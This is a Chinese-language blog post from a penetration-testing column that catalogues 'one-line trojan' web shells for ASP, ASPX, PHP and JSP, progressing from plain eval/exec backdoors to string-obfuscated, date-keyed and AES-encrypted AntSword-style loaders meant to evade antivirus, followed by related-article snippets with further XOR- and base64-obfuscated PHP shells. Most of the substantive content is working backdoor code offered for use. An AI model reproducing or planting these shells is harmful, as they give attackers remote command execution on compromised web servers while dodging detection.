一句话木马的各种变形

最新推荐文章于 2024-04-14 05:32:51 发布
最新推荐文章于 2024-04-14 05:32:51 发布
阅读量2.5k 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunjikui1255326447/article/details/95756961
版权

0x00:简介

        一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。一句话木马一直在跟杀软斗智斗勇,出现一种,杀软秒更新规则。木马再变形,再被杀。。。

0x01:叙事

一、常见的一句话

ASP:<%eval request("pass")%>
ASPX:<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["z"],"unsafe"));%>
PHP:<?php eval(@$_POST['a']); ?>
JSP:<%Runtime.getRuntime().exec(request.getParameter("i"));%>//无回显示执行系统命令

二、简单变形

ASP:<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>//-7

ASPX:<%@ Page Language = Jscript %>
<%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/
"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+
"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+
","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval
(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>//-7

PHP:<?php $_GET[a]($_GET[b]);?>

JSP:<%
if(request.getParameter("f")!=null)(new 
java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

三、二次变形

ASP:<%if request ("MH")<>""then session("MH")=request("MH"):end 
if:if session("MH")<>"" then execute session("MH")%>

ASPX:<%@ Page 
Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36",
 "MD5").ToUpper()],"unsafe");%>//随日期变化的连接密码

PHP:<?php ($_=@$_GET[2]).@$_($_POST[1])?>

JSP:<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>

四、三次变形

ASP:<%@Page Language="C#" %><%@Import namespace="System.Reflection"%><%if (Request["pass"]!=null){ Session.Add("k", Guid.NewGuid().ToString().Replace("-", "").Substring(16)); Response.Write(Session[0]); return;}byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>//蚁剑中的一句话

PHP:<?php session_start();isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSION['k'])))&call_user_func($b[0],$b[1]);?>//蚁剑中的一句话

JSP:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>//蚁剑中的一句话

五、四次变形

  1、利用随机异或无限免杀d盾蚁剑版:

项目地址:https://github.com/yzddmr6/as_webshell_venom

   2、利用动态二进制加密实现新型一句话木马:

文章地址:https://xz.aliyun.com/t/2799

0x02:后话

    一句话木马变形有很多种方式,文中举例只是其中几种方式。千奇百怪的变形,不断的变化,都是为了躲避杀软的检测。杀软也在不断的更新规则库。两者都是在博弈中不断的强大。

 

司徒荆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一句话木马要点和防范注意事项
05-24
一句话木马要点和防范注意事项
一句话木马各种变形
qq_37872337的博客
06-13 1764
0x00:简介         一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。一句话木马一直在跟杀软斗智斗勇,出现一种,杀软秒更新规则。木马再变形,再被杀。。。 0x01:叙事 一、常见的一句话 ...
Web安全-一句话木马
热门推荐
道阻且长,行则将至。
05-08 30万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
一句话木马免杀,看完99%的人都学会了
最新发布
2401_83739727的博客
04-14 936
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
基于php一句话木马的变种总结
Alexz__的博客
10-10 4699
说实话php我只是在w3c系统的看了30分钟,对不是3天30天3个小时是30分钟 那我能不能说我花半个小时接通了一门计算机语言呢 (逃 需要记住的是:熟读PHP手册就会有不一样的发现 贴上来的都是亲测能用 php5.4.45 apache phpstudy环境 $_GET函数数据来源的web响应木马 @system($_GET['shell']) @pass...
php一句话木马变形技巧
bylfsj的博客
09-24 4万+
一、什么是一句话木马一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 二、我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ...
Aspx 一句话木马和客户端(备用)
eldn__的专栏
04-18 1625
以下是引用片段: 这个一句话不用说了!我之前已经发表文章讲解过! client端HTML页面代码如下 以下是引用片段: I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320 body,td{font-size: 12px;} table{T:expression(this.border='1',this.borderColorLigh
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
探索基于.NET下实现一句话木马之asmx篇1
08-03
【.NET下实现一句话木马之asmx篇】 在网络安全领域,木马程序通常被视为恶意软件,但在合法的安全研究和漏洞测试中,了解其工作原理是至关重要的。本篇文章主要探讨了如何在.NET环境中利用ASMX(Web Service)技术...
PHP一句话木马变形
weixin_40195907的博客
11-25 2611
PHP的一句话木马 @ 表示忽略报错 $_POST 表示使用post的方式提交变量 attack代表为变量名 <?php @eval($_POST['attack'])?> 上传木马使用实例:
一句话木马简介
qq_41272376的博客
02-15 6831
一句话木马简介 一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: <?php
变形一句话木马
时光凉春衫薄的博客
10-14 1563
变形一句话木马 下图是一个解析的东西:这是个一句话木马变形通过异或运算来规避所有的敏感函数。。。 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?&gt...
一句话木马变形(编码)
buffedon的博客
12-20 805
一句话木马变形(编码) 注意:如果全文只是加密的密文的话,那么就相当于是一个字符串,在解析的时候不符合语义,依然不会检测出来 base64 编码 php <?php $c = base64_decode('YXNzZXJ0'); $c($_POST['pwd']); ?> java语言 <%@ Page Language="Jscript" Debug=true%> <% var a=Request.Form("mr6"); var res=System.Text.Encod
变种一句话木马
qq_44060093的博客
04-04 926
墨者学院有一道例题 我们打开网站发现了一串php代码 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?> 看着很乱里面用了好多异或运算,但我们只需要打印出...
PHP免杀方法
wutiangui的博客
06-07 844
/ 函数变形 assert 达到免杀(免除杀毒软件识别)的效果:如。//将eval变形为evee。函数从字符串的两端删除空白字符和其他预定义字符。函数把字符串中每个单词的首字符转换为大写。函数把字符串的一部分替换为另一个字符串。函数把字符串中的首字符转换为大写。函数把字符串分割为更小的字符串。函数转换字符串中特定的字符。函数返回字符串的一部分。函数把字符串转换为大写。函数把字符串转换为小写。
免杀学习——PHP免杀
ZxC789456302的博客
10-23 1744
php上马免杀,理论上是只要绕过waf就可以,但特殊情况下存在驻场人员手动监控,看到一些奇怪的参就直接给你ban了,所以各位师傅尽量不要在一些敏感时期进行渗透测试,仅用于技术学习推荐大家去看一下这位师傅的文章php免杀合集 - 跳跳糖 (tttang.com),里面还有一些扩展,十分详细。
excel一句话木马
01-26
Excel一句话木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值